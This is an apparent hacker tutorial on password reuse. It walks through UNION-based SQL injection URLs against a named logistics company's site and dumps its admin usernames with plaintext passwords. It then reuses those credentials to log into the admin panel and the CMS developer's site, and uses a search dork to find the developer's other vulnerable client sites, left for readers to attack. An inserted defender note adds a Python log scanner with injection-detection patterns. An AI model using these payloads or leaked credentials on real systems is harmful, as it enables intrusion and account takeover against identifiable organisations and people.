../password_reuse_multi-pwn_like_an_old_school_hacker

/bit/and/cheese

~/today i'll walk u through an epitome of password reuse - and how we pwn several sites with simple vulns_ anatomy of this tutorial is simple:_

= using only w3m + wget - because im old school & fucking cool

= union injection

= exploit password reuse

$ first we got a target

wget -S --spider "http://whitearrowlogistics.com/storage.asp?id=19\'"

HTTP request sent, awaiting response...

HTTP/1.1 500 Internal Server Error <<< status code is true

Date: [n/a]

Server: Microsoft-IIS/6.0

X-Powered-By: PleskWin

X-Powered-By: ASP.NET

$ now we use w3m to confirm

w3m -dump "http://whitearrowlogistics.com/storage.asp?id=19\'"|grep 'error'|less

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver]

$ vulnerable - mysql - so we need to find the version_ most mysql versions have 'community' in them - so we gonna grep for this (since the output was cluttered - we're gonna mark the output with square brackets = 0x5b 0x5d)

w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null--'|grep community|less

$ next we seek for current db

w3m -dump 'http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null--'|grep 'db'|less

$ now we dump the username and password

w3m -dump http://whitearrowlogistics.com/storage.asp?id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,%28select%20concat%280x7174696a71,ifnull%28cast%28password%20as%20char%29,0x3c62722f3e20%29,0x66727378756d,ifnull%28cast%28username%20as%20char%29,0x3c62722f3e20%29,0x716c627571%29%20from%20whitearrowdb.admin_users%20limit%202,1%29,null,null--|less

$ voila!_

user pass

nigel neubiberg1

ken na691500a

mark whitearrow682424
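$ a defender-side note added here - this is not part of the original tutorial_ every request above leaves a distinctive trail in the web server logs_ the python below scans constructed iis-style log lines (a simplified w3c layout is assumed: date time method uri-stem uri-query status) for the markers this walkthrough relies on - a trailing quote that triggers a 500, union all select, @@version, database(), the 0x5b/0x5d hex delimiters and the -- comment tail - and reports which signals each request trips_

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (simplified IIS W3C layout, assumed):
# date time method uri-stem uri-query status. Not taken from any real server.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /storage.asp id=19 200
2024-01-01 10:00:05 GET /storage.asp id=19' 500
2024-01-01 10:00:09 GET /storage.asp id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x5b,@@version,0x5b,0x2e%29,null,null-- 200
2024-01-01 10:00:12 GET /storage.asp id=-19%20and%201=2%20union%20all%20select%20null,null,null,null,null,null,concat%280x2e,0x5b,database(),0x5d,0x2e%29,null,null-- 200
2024-01-01 10:00:20 GET /about.asp page=2 200
"""

# Each signal maps to one stage of the walkthrough: error probing with a
# quote, union-based column discovery, version/db fingerprinting, and the
# hex delimiters used to find the injected output in a cluttered page.
SIGNALS = {
    "error_probe": re.compile(r"['\"]\s*$"),
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "version_leak": re.compile(r"@@version|version\(\)", re.I),
    "db_name_leak": re.compile(r"\bdatabase\(\)", re.I),
    "hex_marker": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "comment_tail": re.compile(r"--\s*$|#\s*$|/\*"),
}

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)

def classify(query: str) -> list[str]:
    """URL-decode the query string and return the names of all signals it trips."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNALS.items() if rx.search(decoded)]

def scan(log_text: str) -> list[dict]:
    """Return one finding per log line that trips at least one signal."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        hits = classify(m["query"])
        if hits:
            findings.append({"time": m["time"], "stem": m["stem"],
                             "status": int(m["status"]), "signals": hits})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["stem"], f["status"], ",".join(f["signals"]))
```

a 500 paired with the error_probe signal is the fingerprinting step itself - pages that echo driver errors back to the client are what makes the rest of the walkthrough possible, so that pairing alone is worth an alert_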

$ these blokes used strong pass - too bad they were in plain text!_ time to search for login page

wget -S --spider http://www.whitearrowlogistics.com/login/

wget -S --spider http://www.whitearrowlogistics.com/admin/

$ got lucky on 2nd try_ let's login..._ with w3m (love the jap for this)

w3m http://www.whitearrowlogistics.com/admin/

$ magic!_ now we notice a line at the bottom of the admin page that said >> Please contact sales@e-cc.org 'blah blah' << it means we have found the CMS dev_ let's see if we can pwn it too - find admin page

wget -S --spider http://www.whitearrowlogistics.com/admin/

$ same page as the last target - let's try to login with the user/pass we have

w3m http://www.whitearrowlogistics.com/admin/

$ w00t!_ same pass & usr!

$$

$ let's recon the site with Bing search using site:

w3m -dump 'http://www.bing.com/search?q=site:e-cc.org+asp?id=&go=&filt=all&first=1'|less

$ first search result said >> www.e-cc.org/webdesigners.asp?id=6 << let's check if this is vuln too

wget -S --spider www.e-cc.org/webdesigners.asp?id=6

$$ it gave a 500_ response said ADODB.Command error '800a0d5d' - in fact - almost all of their clients' websites have some kind of database errors_ i'll leave this here for you guys to pick up_